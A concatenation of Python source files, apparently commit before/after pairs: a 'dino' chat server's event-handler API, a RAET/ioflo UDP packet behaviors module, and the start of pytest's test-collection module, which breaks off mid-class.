:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
"""
# todo: how to deal with invisibility here?
room_id = activity.target.id
user_id = activity.actor.id
last_read = activity.updated
messages = utils.get_history_for_room(room_id, user_id, last_read)
owners = utils.get_owners_for_room(room_id)
acls = utils.get_acls_for_room(room_id)
users = utils.get_users_in_room(room_id)
environ.env.observer.emit('on_join', (data, activity))
return ECodes.OK, utils.activity_for_join(activity, acls, messages, owners, users)
def on_users_in_room(data: dict, activity: Activity) -> (int, Union[dict, str]):
"""
get a list of users in a room
:param data: activity streams format, need target.id (room id)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok, {'status_code': ECodes.OK, 'data': <AS with users as object.attachments>}
"""
# TODO: should people not in the room be able to list users in the room?
room_id = activity.target.id
users = utils.get_users_in_room(room_id)
environ.env.observer.emit('on_users_in_room', (data, activity))
return ECodes.OK, utils.activity_for_users_in_room(activity, users)
def on_list_rooms(data: dict, activity: Activity) -> (int, Union[dict, str]):
"""
get a list of rooms
:param data: activity streams format, needs actor.id (user id) and object.id (channel id)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok, {'status_code': ECodes.OK, 'data': <AS with rooms as object.attachments>}
"""
channel_id = activity.object.url
rooms = environ.env.db.rooms_for_channel(channel_id)
environ.env.observer.emit('on_list_rooms', (data, activity))
return ECodes.OK, utils.activity_for_list_rooms(activity, rooms)
def on_list_channels(data: dict, activity: Activity) -> (int, Union[dict, str]):
"""
get a list of channels
:param data: activity streams format, needs actor.id (user id)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok, {'status_code': ECodes.OK, 'data': <AS with channels as object.attachments>}
"""
channels = environ.env.db.get_channels()
environ.env.observer.emit('on_list_channels', (data, activity))
return ECodes.OK, utils.activity_for_list_channels(activity, channels)
def on_leave(data: dict, activity: Activity) -> (int, Union[str, None]):
"""
leave a room
:param data: activity streams format, needs actor.id (user id), actor.summary (user name), target.id (room id)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
"""
environ.env.observer.emit('on_leave', (data, activity))
return ECodes.OK, None
def on_disconnect() -> (int, None):
"""
when a client disconnects or the server no longer gets a ping response from the client
:return json if ok, {'status_code': 200}
"""
environ.env.observer.emit('on_disconnect', (None, None))
return ECodes.OK, None
base64 encode room/channel/user names in gn_message response
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Union
from uuid import uuid4 as uuid
from activitystreams.models.activity import Activity
from dino.config import ApiTargets
from dino.config import ErrorCodes as ECodes
from dino.utils import b64e
from dino.hooks import *
__author__ = 'Oscar Eriksson <oscar@thenetcircle.com>'
logger = logging.getLogger(__name__)
def connect() -> (int, None):
"""
connect to the server
:return: {'status_code': 200}
"""
environ.env.observer.emit('on_connect', (None, None))
return ECodes.OK, None
def on_login(data: dict, activity: Activity) -> (int, Union[str, None]):
"""
event sent directly after a connection has successfully been made, to get the user_id for this connection
:param data: activity streams format, needs actor.id (user id) and actor.summary (user name)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
"""
environ.env.observer.emit('on_login', (data, activity))
return ECodes.OK, None
def on_delete(data: dict, activity: Activity):
environ.env.observer.emit('on_delete', (data, activity))
return ECodes.OK, None
def on_message(data, activity: Activity):
"""
send any kind of message/event to a target user/room
object.url: target channel_id
target.id: target room_id
actor.id: sender user_id
actor.url: sender room_id
:param data: activity streams format, must include target.id (room/user id) and object.url (channel id)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: {'status_code': ECodes.OK, 'data': '<same AS as client sent, plus timestamp>'}
"""
room_id = activity.target.id
from_room_id = activity.actor.url
# only if cross-room should we broadcast the origin room id with the activity; less confusion for clients
if from_room_id is not None and from_room_id == room_id:
del data['actor']['url']
if activity.target.object_type == 'room':
activity.target.display_name = utils.get_room_name(activity.target.id)
activity.object.summary = utils.get_channel_name(activity.object.url)
else:
activity.target.display_name = utils.get_user_name_for(activity.target.id)
activity.object.summary = ''
activity.object.url = ''
activity.actor.summary = environ.env.session.get(SessionKeys.user_name.value)
data['actor']['summary'] = b64e(activity.actor.summary)
data['target']['displayName'] = b64e(activity.target.display_name)
data['object']['summary'] = b64e(activity.object.summary)
environ.env.observer.emit('on_message', (data, activity))
return ECodes.OK, data
def on_ban(data: dict, activity: Activity) -> (int, Union[str, None]):
"""
ban a user from a room (if user is an owner/admin/moderator)
target.id: the uuid of the room that the user is in
target.displayName: the room name
object.id: the id of the user to kick
object.content: the name of the user to kick
object.summary: the ban time, e.g.
actor.id: the id of the kicker
actor.content: the name of the kicker
:param data: activity streams format
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
"""
environ.env.observer.emit('on_ban', (data, activity))
environ.env.observer.emit('on_kick', (data, activity))
return ECodes.OK, None
def on_kick(data: dict, activity: Activity) -> (int, None):
"""
kick a user from a room (if user is an owner)
target.id: the uuid of the room that the user is in
target.displayName: the room name
object.id: the id of the user to kick
object.content: the name of the user to kick
actor.id: the id of the kicker
actor.content: the name of the kicker
:param data: activity streams format
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
"""
environ.env.observer.emit('on_kick', (data, activity))
return ECodes.OK, None
def on_whisper(data: dict, activity: Activity) -> (int, None):
"""
whisper to another person in the same room, only that person will receive the event. Functions as a private message
:param data: activity streams format
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
"""
environ.env.observer.emit('on_whisper', (data, activity))
return ECodes.OK, None
def on_invite(data: dict, activity: Activity) -> (int, None):
"""
invite a user to the a room this user is in
:param data: activity streams format
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
"""
environ.env.observer.emit('on_invite', (data, activity))
return ECodes.OK, None
def on_request_admin(data: dict, activity: Activity) -> (int, None):
"""
request the presence of an admin in the current room
:param data: activity streams format
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
"""
environ.env.observer.emit('on_request_admin', (data, activity))
return ECodes.OK, None
def on_create(data: dict, activity: Activity) -> (int, dict):
"""
create a new room
:param data: activity streams format, must include target.display_name (room name) and object.id (channel id)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': ECodes.OK, 'data': '<same AS as in the request, with addition of target.id (generated UUID
for the new room>'}, else: {'status_code': 400, 'data': '<error message>'}
"""
# generate a uuid for this room
activity.target.id = str(uuid())
data['target']['id'] = activity.target.id
environ.env.observer.emit('on_create', (data, activity))
return ECodes.OK, data
def on_set_acl(data: dict, activity: Activity) -> (int, str):
"""
change ACL of a room; only allowed if the user is the owner of the room
:param data: activity streams, acls as attachments to object with object_type as acl name and content as acl value
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
"""
environ.env.observer.emit('on_set_acl', (data, activity))
return ECodes.OK, None
def on_get_acl(data: dict, activity: Activity) -> (int, Union[str, dict]):
"""
change ACL of a room; only allowed if the user is the owner of the room
:param data: activity streams format
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<AS with acl as object.attachments>'}
"""
if activity.target.object_type == ApiTargets.CHANNEL:
acls = utils.get_acls_for_channel(activity.target.id)
else:
acls = utils.get_acls_for_room(activity.target.id)
environ.env.observer.emit('on_get_acl', (data, activity))
return ECodes.OK, utils.activity_for_get_acl(activity, acls)
def on_status(data: dict, activity: Activity) -> (int, Union[str, None]):
"""
change online status
:param data: activity streams format, needs actor.id (user id), actor.summary (user name) and verb
(online/invisible/offline)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
"""
environ.env.observer.emit('on_status', (data, activity))
return ECodes.OK, None
def on_history(data: dict, activity: Activity) -> (int, Union[str, None]):
"""
get the history of a room
the 'updated' field is optional, and if set history since that point will be returned (only if dino has been
configured with the history type 'unread' instead of 'top')
:param data: activity streams format
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
"""
room_id = activity.target.id
user_id = activity.actor.id
last_read = activity.updated
messages = utils.get_history_for_room(room_id, user_id, last_read)
environ.env.observer.emit('on_history', (data, activity))
return ECodes.OK, utils.activity_for_history(activity, messages)
def on_join(data: dict, activity: Activity) -> (int, Union[str, None]):
"""
join a room
:param data: activity streams format, need actor.id (user id), target.id (user id), actor.summary (user name)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
"""
# todo: how to deal with invisibility here?
room_id = activity.target.id
user_id = activity.actor.id
last_read = activity.updated
messages = utils.get_history_for_room(room_id, user_id, last_read)
owners = utils.get_owners_for_room(room_id)
acls = utils.get_acls_for_room(room_id)
users = utils.get_users_in_room(room_id)
environ.env.observer.emit('on_join', (data, activity))
return ECodes.OK, utils.activity_for_join(activity, acls, messages, owners, users)
def on_users_in_room(data: dict, activity: Activity) -> (int, Union[dict, str]):
"""
get a list of users in a room
:param data: activity streams format, need target.id (room id)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok, {'status_code': ECodes.OK, 'data': <AS with users as object.attachments>}
"""
# TODO: should people not in the room be able to list users in the room?
room_id = activity.target.id
users = utils.get_users_in_room(room_id)
environ.env.observer.emit('on_users_in_room', (data, activity))
return ECodes.OK, utils.activity_for_users_in_room(activity, users)
def on_list_rooms(data: dict, activity: Activity) -> (int, Union[dict, str]):
"""
get a list of rooms
:param data: activity streams format, needs actor.id (user id) and object.id (channel id)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok, {'status_code': ECodes.OK, 'data': <AS with rooms as object.attachments>}
"""
channel_id = activity.object.url
rooms = environ.env.db.rooms_for_channel(channel_id)
environ.env.observer.emit('on_list_rooms', (data, activity))
return ECodes.OK, utils.activity_for_list_rooms(activity, rooms)
def on_list_channels(data: dict, activity: Activity) -> (int, Union[dict, str]):
"""
get a list of channels
:param data: activity streams format, needs actor.id (user id)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok, {'status_code': ECodes.OK, 'data': <AS with channels as object.attachments>}
"""
channels = environ.env.db.get_channels()
environ.env.observer.emit('on_list_channels', (data, activity))
return ECodes.OK, utils.activity_for_list_channels(activity, channels)
def on_leave(data: dict, activity: Activity) -> (int, Union[str, None]):
"""
leave a room
:param data: activity streams format, needs actor.id (user id), actor.summary (user name), target.id (room id)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
"""
environ.env.observer.emit('on_leave', (data, activity))
return ECodes.OK, None
def on_disconnect() -> (int, None):
"""
when a client disconnects or the server no longer gets a ping response from the client
:return json if ok, {'status_code': 200}
"""
environ.env.observer.emit('on_disconnect', (None, None))
return ECodes.OK, None
|
# -*- coding: utf-8 -*-
'''
behaving.py raet ioflo behaviors
See raeting.py for data format and packet field details.
Data format. The data from which a packet is created is a nested dict of dicts.
What fields are included in a packed head, neck, body is dependent
on the header kind, service kind, packet kind and defaults.
To minimize lenght of JSON headers if field missing then the default is assumed
data =
{
meta: dict of meta data about packet
{
}
head: dict of header fields
{
pack: packed version of header
}
neck: dict of authentication fields
{
pack: packed version of neck
}
body: dict of body fields
{
pack: packed version of body
}
pack: packed version of whole packet on tx and raw packet on rx
}
'''
# pylint: disable=W0611
# Import Python libs
from collections import deque
try:
import simplejson as json
except ImportError:
import json
# Import ioflo libs
from ioflo.base.odicting import odict
from ioflo.base.globaling import *
from ioflo.base import aiding
from ioflo.base import storing
from ioflo.base import deeding
from ioflo.base.consoling import getConsole
console = getConsole()
from . import raeting
class ComposerRaet(deeding.ParamDeed): # pylint: disable=W0232
'''
ComposerRaet creates packet data as nested dicts from fields in
share parms meta, head, neck, body, tail
inherited attributes
.name is actor name string
.store is data store ref
.ioinits is dict of io init data for initio
._parametric is flag for initio to not create attributes
'''
Ioinits = odict(
data=odict(ipath='data', ival=odict(), iown='True'),
meta='meta',
head='head',
neck='neck',
body='body',
tail='tail')
def action(self, data, meta, head, neck, body, tail, **kwa):
'''
Build packet data from data section shares
'''
dat = raeting.defaultData()
dat['meta'].update(raeting.META_DEFAULTS)
dat['meta'].update(meta.items())
dat['head'].update(raeting.HEAD_DEFAULTS)
dat['head'].update(head.items())
dat['neck'].update(neck.items())
dat['body'].update(data=odict(body.items()))
dat['tail'].update(tail.items())
data.value = dat
return None
class PackerRaet(deeding.ParamDeed): # pylint: disable=W0232
'''
PackerRaet creates a new packed RAET packet from data and fills in pack field
inherited attributes
.name is actor name string
.store is data store ref
.ioinits is dict of io init data for initio
._parametric is flag for initio to not create attributes
'''
Ioinits = odict(
data=odict(ipath='data', ival=odict(), iown=True),
outlog=odict(ipath='outlog', ival=odict(), iown=True),)
def action(self, data, outlog, **kwa):
""" Build packet from data"""
if data.value:
raeting.packPacket(data.value)
data.stampNow()
outlog.value[(data.value['meta']['dh'], data.value['meta']['dp'])] = data.value['body'].get('data', {})
return None
class ParserRaet(deeding.ParamDeed): # pylint: disable=W0232
'''
ParserRaet parses a packed RAET packet from pack and fills in data
inherited attributes
.name is actor name string
.store is data store ref
.ioinits is dict of io init data for initio
._parametric is flag for initio to not create attributes
'''
Ioinits = odict(
data=odict(ipath='data', ival=odict(), iown=True),
inlog=odict(ipath='inlog', ival=odict(), iown=True),)
def action(self, data, inlog, **kwa):
""" Parse packet from raw packed"""
if data.value:
data.value = raeting.defaultData(data.value)
rest = raeting.parsePacket(data.value)
data.stampNow()
inlog.value[(data.value['meta']['sh'], data.value['meta']['sp'])] = data.value['body'].get('data', {})
return None
class TransmitterRaet(deeding.ParamDeed): # pylint: disable=W0232
'''
TransmitterRaet pushes packed packet in onto txes transmit deque and assigns
destination ha from meta data
inherited attributes
.name is actor name string
.store is data store ref
.ioinits is dict of io init data for initio
._parametric is flag for initio to not create attributes
'''
Ioinits = odict(
data='data',
txes=odict(ipath='.raet.media.txes', ival=deque()),)
def action(self, data, txes, **kwa):
'''
Transmission action
'''
if data.value:
da = (data.value['meta']['dh'], data.value['meta']['dp'])
txes.value.append((data.value['pack'], da))
return None
class ReceiverRaet(deeding.ParamDeed): # pylint: disable=W0232
'''
ReceiverRaet pulls packet from rxes deque and puts into new data
and assigns meta data source ha using received ha
inherited attributes
.name is actor name string
.store is data store ref
.ioinits is dict of io init data for initio
._parametric is flag for initio to not create attributes
'''
Ioinits = odict(
data='data',
rxes=odict(ipath='.raet.media.rxes', ival=deque()), )
def action(self, data, rxes, **kwa):
'''
Handle recived packet
'''
if rxes.value:
rx, sa, da = rxes.value.popleft()
data.value = raeting.defaultData()
data.value['pack'] = rx
data.value['meta']['sh'], data.value['meta']['sp'] = sa
data.value['meta']['dh'], data.value['meta']['dp'] = da
return None
class ServerRaet(deeding.ParamDeed): # pylint: disable=W0232
'''
ServerRaet transmits and recieves udp packets from txes and rxes deques
using sh, sp fields in sa server address (server host, server port) to receive on.
Server is nonblocking socket connection
inherited attributes
.name is actor name string
.store is data store ref
.ioinits is dict of io init data for initio
._parametric is flag for initio to not create attributes
'''
Ioinits = odict(
txes=odict(ipath='txes', ival=deque(), iown=True),
rxes=odict(ipath='rxes', ival=deque(), iown=True),
connection=odict(ipath='connection', ival=None, iown=True),
address=odict(ipath='address', ival=odict(host='', port=7530, ha=None)),
txlog=odict(ipath='txlog', ival=odict(), iown=True),
rxlog=odict(ipath='rxlog', ival=odict(), iown=True), )
def postinitio(self, connection, address, **kwa):
'''
Set up server to transmit and recive on address
'''
connection.value = aiding.SocketUdpNb(host=address.data.host, port=address.data.port)
connection.value.reopen() # create socket connection
host, port = connection.value.ha
address.update(host=host, port=port, ha=(host, port))
return None
def action(self, txes, rxes, connection, address, txlog, rxlog, **kwa):
'''
Receive any udp packets on server socket and put in rxes
Send any packets in txes
'''
server = connection.value
txl = txlog.value
rxl = rxlog.value
if server:
rxds = rxes.value
while True:
rx, ra = server.receive() # if no data the tuple is ('',None)
if not rx: # no received data so break
break
rxds.append((rx, ra, address.data.ha))
rxl[ra] = rx
txds = txes.value
while txds:
tx, ta = txds.popleft()
server.send(tx, ta)
txl[ta] = tx
return None
class CloserServerRaet(deeding.ParamDeed): # pylint: disable=W0232
'''
CloserServerRaet closes server socket connection
inherited attributes
.name is actor name string
.store is data store ref
.ioinits is dict of io init data for initio
._parametric is flag for initio to not create attributes
'''
Ioinits = odict(
connection=odict(ipath='connection', ival=None))
def action(self, connection, **kwa):
'''
Receive any udp packets on server socket and put in rxes
Send any packets in txes
'''
if connection.value:
connection.value.close()
return None
Make Pylint ignore file
# -*- coding: utf-8 -*-
'''
behaving.py raet ioflo behaviors
See raeting.py for data format and packet field details.
Data format. The data from which a packet is created is a nested dict of dicts.
What fields are included in a packed head, neck, body is dependent
on the header kind, service kind, packet kind and defaults.
To minimize lenght of JSON headers if field missing then the default is assumed
data =
{
meta: dict of meta data about packet
{
}
head: dict of header fields
{
pack: packed version of header
}
neck: dict of authentication fields
{
pack: packed version of neck
}
body: dict of body fields
{
pack: packed version of body
}
pack: packed version of whole packet on tx and raw packet on rx
}
'''
# pylint: skip-file
# pylint: disable=W0611
# Import Python libs
from collections import deque
try:
import simplejson as json
except ImportError:
import json
# Import ioflo libs
from ioflo.base.odicting import odict
from ioflo.base.globaling import *
from ioflo.base import aiding
from ioflo.base import storing
from ioflo.base import deeding
from ioflo.base.consoling import getConsole
console = getConsole()
from . import raeting
class ComposerRaet(deeding.ParamDeed): # pylint: disable=W0232
'''
ComposerRaet creates packet data as nested dicts from fields in
share parms meta, head, neck, body, tail
inherited attributes
.name is actor name string
.store is data store ref
.ioinits is dict of io init data for initio
._parametric is flag for initio to not create attributes
'''
Ioinits = odict(
data=odict(ipath='data', ival=odict(), iown='True'),
meta='meta',
head='head',
neck='neck',
body='body',
tail='tail')
def action(self, data, meta, head, neck, body, tail, **kwa):
'''
Build packet data from data section shares
'''
dat = raeting.defaultData()
dat['meta'].update(raeting.META_DEFAULTS)
dat['meta'].update(meta.items())
dat['head'].update(raeting.HEAD_DEFAULTS)
dat['head'].update(head.items())
dat['neck'].update(neck.items())
dat['body'].update(data=odict(body.items()))
dat['tail'].update(tail.items())
data.value = dat
return None
class PackerRaet(deeding.ParamDeed): # pylint: disable=W0232
'''
PackerRaet creates a new packed RAET packet from data and fills in pack field
inherited attributes
.name is actor name string
.store is data store ref
.ioinits is dict of io init data for initio
._parametric is flag for initio to not create attributes
'''
Ioinits = odict(
data=odict(ipath='data', ival=odict(), iown=True),
outlog=odict(ipath='outlog', ival=odict(), iown=True),)
def action(self, data, outlog, **kwa):
""" Build packet from data"""
if data.value:
raeting.packPacket(data.value)
data.stampNow()
outlog.value[(data.value['meta']['dh'], data.value['meta']['dp'])] = data.value['body'].get('data', {})
return None
class ParserRaet(deeding.ParamDeed): # pylint: disable=W0232
'''
ParserRaet parses a packed RAET packet from pack and fills in data
inherited attributes
.name is actor name string
.store is data store ref
.ioinits is dict of io init data for initio
._parametric is flag for initio to not create attributes
'''
Ioinits = odict(
data=odict(ipath='data', ival=odict(), iown=True),
inlog=odict(ipath='inlog', ival=odict(), iown=True),)
def action(self, data, inlog, **kwa):
""" Parse packet from raw packed"""
if data.value:
data.value = raeting.defaultData(data.value)
rest = raeting.parsePacket(data.value)
data.stampNow()
inlog.value[(data.value['meta']['sh'], data.value['meta']['sp'])] = data.value['body'].get('data', {})
return None
class TransmitterRaet(deeding.ParamDeed): # pylint: disable=W0232
'''
TransmitterRaet pushes packed packet in onto txes transmit deque and assigns
destination ha from meta data
inherited attributes
.name is actor name string
.store is data store ref
.ioinits is dict of io init data for initio
._parametric is flag for initio to not create attributes
'''
Ioinits = odict(
data='data',
txes=odict(ipath='.raet.media.txes', ival=deque()),)
def action(self, data, txes, **kwa):
'''
Transmission action
'''
if data.value:
da = (data.value['meta']['dh'], data.value['meta']['dp'])
txes.value.append((data.value['pack'], da))
return None
class ReceiverRaet(deeding.ParamDeed): # pylint: disable=W0232
'''
ReceiverRaet pulls packet from rxes deque and puts into new data
and assigns meta data source ha using received ha
inherited attributes
.name is actor name string
.store is data store ref
.ioinits is dict of io init data for initio
._parametric is flag for initio to not create attributes
'''
Ioinits = odict(
data='data',
rxes=odict(ipath='.raet.media.rxes', ival=deque()), )
def action(self, data, rxes, **kwa):
'''
Handle recived packet
'''
if rxes.value:
rx, sa, da = rxes.value.popleft()
data.value = raeting.defaultData()
data.value['pack'] = rx
data.value['meta']['sh'], data.value['meta']['sp'] = sa
data.value['meta']['dh'], data.value['meta']['dp'] = da
return None
class ServerRaet(deeding.ParamDeed): # pylint: disable=W0232
'''
ServerRaet transmits and recieves udp packets from txes and rxes deques
using sh, sp fields in sa server address (server host, server port) to receive on.
Server is nonblocking socket connection
inherited attributes
.name is actor name string
.store is data store ref
.ioinits is dict of io init data for initio
._parametric is flag for initio to not create attributes
'''
Ioinits = odict(
txes=odict(ipath='txes', ival=deque(), iown=True),
rxes=odict(ipath='rxes', ival=deque(), iown=True),
connection=odict(ipath='connection', ival=None, iown=True),
address=odict(ipath='address', ival=odict(host='', port=7530, ha=None)),
txlog=odict(ipath='txlog', ival=odict(), iown=True),
rxlog=odict(ipath='rxlog', ival=odict(), iown=True), )
def postinitio(self, connection, address, **kwa):
'''
Set up server to transmit and recive on address
'''
connection.value = aiding.SocketUdpNb(host=address.data.host, port=address.data.port)
connection.value.reopen() # create socket connection
host, port = connection.value.ha
address.update(host=host, port=port, ha=(host, port))
return None
def action(self, txes, rxes, connection, address, txlog, rxlog, **kwa):
'''
Receive any udp packets on server socket and put in rxes
Send any packets in txes
'''
server = connection.value
txl = txlog.value
rxl = rxlog.value
if server:
rxds = rxes.value
while True:
rx, ra = server.receive() # if no data the tuple is ('',None)
if not rx: # no received data so break
break
rxds.append((rx, ra, address.data.ha))
rxl[ra] = rx
txds = txes.value
while txds:
tx, ta = txds.popleft()
server.send(tx, ta)
txl[ta] = tx
return None
class CloserServerRaet(deeding.ParamDeed): # pylint: disable=W0232
'''
CloserServerRaet closes server socket connection
inherited attributes
.name is actor name string
.store is data store ref
.ioinits is dict of io init data for initio
._parametric is flag for initio to not create attributes
'''
Ioinits = odict(
connection=odict(ipath='connection', ival=None))
def action(self, connection, **kwa):
'''
Receive any udp packets on server socket and put in rxes
Send any packets in txes
'''
if connection.value:
connection.value.close()
return None
|
""" Python test discovery, setup and run of test functions. """
import enum
import fnmatch
import inspect
import os
import sys
import warnings
from collections import Counter
from collections.abc import Sequence
from functools import partial
from textwrap import dedent
from typing import Tuple
import py
import _pytest
from _pytest import fixtures
from _pytest import nodes
from _pytest._code import filter_traceback
from _pytest.compat import ascii_escaped
from _pytest.compat import get_default_arg_names
from _pytest.compat import get_real_func
from _pytest.compat import getfslineno
from _pytest.compat import getimfunc
from _pytest.compat import getlocation
from _pytest.compat import is_generator
from _pytest.compat import iscoroutinefunction
from _pytest.compat import NOTSET
from _pytest.compat import REGEX_TYPE
from _pytest.compat import safe_getattr
from _pytest.compat import safe_isclass
from _pytest.compat import STRING_TYPES
from _pytest.config import hookimpl
from _pytest.deprecated import FUNCARGNAMES
from _pytest.main import FSHookProxy
from _pytest.mark import MARK_GEN
from _pytest.mark.structures import get_unpacked_marks
from _pytest.mark.structures import normalize_mark_list
from _pytest.outcomes import fail
from _pytest.outcomes import skip
from _pytest.pathlib import parts
from _pytest.warning_types import PytestCollectionWarning
from _pytest.warning_types import PytestUnhandledCoroutineWarning
def pyobj_property(name):
def get(self):
node = self.getparent(getattr(__import__("pytest"), name))
if node is not None:
return node.obj
doc = "python {} object this node was collected from (can be None).".format(
name.lower()
)
return property(get, None, None, doc)
def pytest_addoption(parser):
group = parser.getgroup("general")
group.addoption(
"--fixtures",
"--funcargs",
action="store_true",
dest="showfixtures",
default=False,
help="show available fixtures, sorted by plugin appearance "
"(fixtures with leading '_' are only shown with '-v')",
)
group.addoption(
"--fixtures-per-test",
action="store_true",
dest="show_fixtures_per_test",
default=False,
help="show fixtures per test",
)
parser.addini(
"python_files",
type="args",
# NOTE: default is also used in AssertionRewritingHook.
default=["test_*.py", "*_test.py"],
help="glob-style file patterns for Python test module discovery",
)
parser.addini(
"python_classes",
type="args",
default=["Test"],
help="prefixes or glob names for Python test class discovery",
)
parser.addini(
"python_functions",
type="args",
default=["test"],
help="prefixes or glob names for Python test function and method discovery",
)
parser.addini(
"disable_test_id_escaping_and_forfeit_all_rights_to_community_support",
type="bool",
default=False,
help="disable string escape non-ascii characters, might cause unwanted "
"side effects(use at your own risk)",
)
group.addoption(
"--import-mode",
default="prepend",
choices=["prepend", "append"],
dest="importmode",
help="prepend/append to sys.path when importing test modules, "
"default is to prepend.",
)
def pytest_cmdline_main(config):
if config.option.showfixtures:
showfixtures(config)
return 0
if config.option.show_fixtures_per_test:
show_fixtures_per_test(config)
return 0
def pytest_generate_tests(metafunc):
# those alternative spellings are common - raise a specific error to alert
# the user
alt_spellings = ["parameterize", "parametrise", "parameterise"]
for mark_name in alt_spellings:
if metafunc.definition.get_closest_marker(mark_name):
msg = "{0} has '{1}' mark, spelling should be 'parametrize'"
fail(msg.format(metafunc.function.__name__, mark_name), pytrace=False)
for marker in metafunc.definition.iter_markers(name="parametrize"):
metafunc.parametrize(*marker.args, **marker.kwargs)
def pytest_configure(config):
config.addinivalue_line(
"markers",
"parametrize(argnames, argvalues): call a test function multiple "
"times passing in different arguments in turn. argvalues generally "
"needs to be a list of values if argnames specifies only one name "
"or a list of tuples of values if argnames specifies multiple names. "
"Example: @parametrize('arg1', [1,2]) would lead to two calls of the "
"decorated test function, one with arg1=1 and another with arg1=2."
"see https://docs.pytest.org/en/latest/parametrize.html for more info "
"and examples.",
)
config.addinivalue_line(
"markers",
"usefixtures(fixturename1, fixturename2, ...): mark tests as needing "
"all of the specified fixtures. see "
"https://docs.pytest.org/en/latest/fixture.html#usefixtures ",
)
@hookimpl(trylast=True)
def pytest_pyfunc_call(pyfuncitem):
def async_warn():
msg = "async def functions are not natively supported and have been skipped.\n"
msg += "You need to install a suitable plugin for your async framework, for example:\n"
msg += " - pytest-asyncio\n"
msg += " - pytest-trio\n"
msg += " - pytest-tornasync"
warnings.warn(PytestUnhandledCoroutineWarning(msg.format(pyfuncitem.nodeid)))
skip(msg="async def function and no async plugin installed (see warnings)")
testfunction = pyfuncitem.obj
if iscoroutinefunction(testfunction) or (
sys.version_info >= (3, 6) and inspect.isasyncgenfunction(testfunction)
):
async_warn()
funcargs = pyfuncitem.funcargs
testargs = {arg: funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames}
result = testfunction(**testargs)
if hasattr(result, "__await__") or hasattr(result, "__aiter__"):
async_warn()
return True
def pytest_collect_file(path, parent):
ext = path.ext
if ext == ".py":
if not parent.session.isinitpath(path):
if not path_matches_patterns(
path, parent.config.getini("python_files") + ["__init__.py"]
):
return
ihook = parent.session.gethookproxy(path)
return ihook.pytest_pycollect_makemodule(path=path, parent=parent)
def path_matches_patterns(path, patterns):
"""Returns True if the given py.path.local matches one of the patterns in the list of globs given"""
return any(path.fnmatch(pattern) for pattern in patterns)
def pytest_pycollect_makemodule(path, parent):
if path.basename == "__init__.py":
return Package(path, parent)
return Module(path, parent)
@hookimpl(hookwrapper=True)
def pytest_pycollect_makeitem(collector, name, obj):
outcome = yield
res = outcome.get_result()
if res is not None:
return
# nothing was collected elsewhere, let's do it here
if safe_isclass(obj):
if collector.istestclass(obj, name):
outcome.force_result(Class(name, parent=collector))
elif collector.istestfunction(obj, name):
# mock seems to store unbound methods (issue473), normalize it
obj = getattr(obj, "__func__", obj)
# We need to try and unwrap the function if it's a functools.partial
# or a functools.wrapped.
# We mustn't if it's been wrapped with mock.patch (python 2 only)
if not (inspect.isfunction(obj) or inspect.isfunction(get_real_func(obj))):
filename, lineno = getfslineno(obj)
warnings.warn_explicit(
message=PytestCollectionWarning(
"cannot collect %r because it is not a function." % name
),
category=None,
filename=str(filename),
lineno=lineno + 1,
)
elif getattr(obj, "__test__", True):
if is_generator(obj):
res = Function(name, parent=collector)
reason = "yield tests were removed in pytest 4.0 - {name} will be ignored".format(
name=name
)
res.add_marker(MARK_GEN.xfail(run=False, reason=reason))
res.warn(PytestCollectionWarning(reason))
else:
res = list(collector._genfunctions(name, obj))
outcome.force_result(res)
def pytest_make_parametrize_id(config, val, argname=None):
return None
class PyobjContext:
module = pyobj_property("Module")
cls = pyobj_property("Class")
instance = pyobj_property("Instance")
class PyobjMixin(PyobjContext):
